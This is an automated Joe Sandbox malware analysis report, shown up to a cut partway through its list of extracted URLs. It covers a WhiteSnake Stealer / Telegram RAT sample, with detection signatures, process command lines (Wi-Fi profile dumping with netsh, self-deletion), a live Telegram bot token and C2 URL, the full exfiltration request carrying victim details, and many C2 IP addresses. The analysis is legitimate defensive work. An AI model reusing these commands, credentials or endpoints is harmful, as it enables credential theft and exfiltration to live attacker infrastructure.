Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BA9qyj2c9G.exe

Overview

General Information

Sample name:BA9qyj2c9G.exe
renamed because original name is a hash value
Original sample name:C9495B3A992EA3E2EF2788C7BA7ED840.exe
Analysis ID:1570929
MD5:c9495b3a992ea3e2ef2788c7ba7ed840
SHA1:3d2e2ff99cd28f81a906d8d928ad7d42ff5226be
SHA256:3398ed7cffcc75371d831fda315805c714268c321c863f60c806ae73cfaae4cd
Tags:exeWhiteSnakeStealeruser-abuse_ch
Infos:

Detection

WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • BA9qyj2c9G.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\BA9qyj2c9G.exe" MD5: C9495B3A992EA3E2EF2788C7BA7ED840)
    • cmd.exe (PID: 7664 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7868 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 8000 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 8036 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 8120 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8168 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 8180 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 8188 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7256 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8156 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 5596 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
    Process Memory Space: BA9qyj2c9G.exe PID: 7496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: BA9qyj2c9G.exe PID: 7496JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security
        Process Memory Space: BA9qyj2c9G.exe PID: 7496JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Invoke-Obfuscation CLIP+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe
          Sigma detected: Invoke-Obfuscation VAR+ Launcher
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe
          Sigma detected: Communication To Uncommon Destination Ports
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 209.38.221.184, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\BA9qyj2c9G.exe, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

          Stealing of Sensitive Information

          barindex
          Sigma detected: Capture Wi-Fi password
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-08T13:01:57.052726+010020458681Successful Credential Theft Detected192.168.2.449731209.38.221.1848080TCP
          2024-12-08T13:01:59.080774+010020458681Successful Credential Theft Detected192.168.2.44973246.235.26.838080TCP
          2024-12-08T13:02:02.956808+010020458681Successful Credential Theft Detected192.168.2.449733147.28.185.2980TCP
          2024-12-08T13:02:04.960666+010020458681Successful Credential Theft Detected192.168.2.449734206.166.251.48080TCP
          2024-12-08T13:02:26.972752+010020458681Successful Credential Theft Detected192.168.2.44974151.159.4.508080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: BA9qyj2c9G.exeAvira: detected
          Found malware configuration
          Source: BA9qyj2c9G.exe.7496.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage"}
          Multi AV Scanner detection for submitted file
          Source: BA9qyj2c9G.exeReversingLabs: Detection: 68%
          Source: BA9qyj2c9G.exeVirustotal: Detection: 66%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: BA9qyj2c9G.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B727A11 CryptUnprotectData,0_2_00007FFD9B727A11
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B727B5D CryptUnprotectData,0_2_00007FFD9B727B5D
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: BA9qyj2c9G.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then dec eax0_2_00007FFD9B72229A
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B731651h0_2_00007FFD9B72EFEA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B730A02h0_2_00007FFD9B72EFEA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B730BF9h0_2_00007FFD9B72EFEA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B724774h0_2_00007FFD9B723F81
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B735F6Dh0_2_00007FFD9B735D53
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B741664h0_2_00007FFD9B7414AA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B731651h0_2_00007FFD9B731269
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B726C8Ch0_2_00007FFD9B726A89
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B7373DAh0_2_00007FFD9B7372C5
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B726C8Ch0_2_00007FFD9B7249DB
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B731651h0_2_00007FFD9B7300EA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then dec eax0_2_00007FFD9B733FBF
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B724748h0_2_00007FFD9B7246D4
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then dec eax0_2_00007FFD9B73162D
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B731651h0_2_00007FFD9B730D7E
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 4x nop then jmp 00007FFD9B7381F1h0_2_00007FFD9B737D21

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49731 -> 209.38.221.184:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49741 -> 51.159.4.50:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49734 -> 206.166.251.4:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49732 -> 46.235.26.83:8080
          Source: Network trafficSuricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49733 -> 147.28.185.29:80
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.4:49731 -> 209.38.221.184:8080
          Source: global trafficTCP traffic: 192.168.2.4:49732 -> 46.235.26.83:8080
          Source: global trafficTCP traffic: 192.168.2.4:49734 -> 206.166.251.4:8080
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 51.159.4.50:8080
          Source: global trafficHTTP traffic detected: GET /bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: ip-api.com
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 209.38.221.184
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 46.235.26.83
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: unknownTCP traffic detected without corresponding DNS query: 147.28.185.29
          Source: global trafficHTTP traffic detected: GET /bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.160.136:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.145.17.167:9090
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.235.70.96:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.88:8099
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.55.47:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%7
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:80802a
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:80802a
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.207.174.88:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:80802a
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080
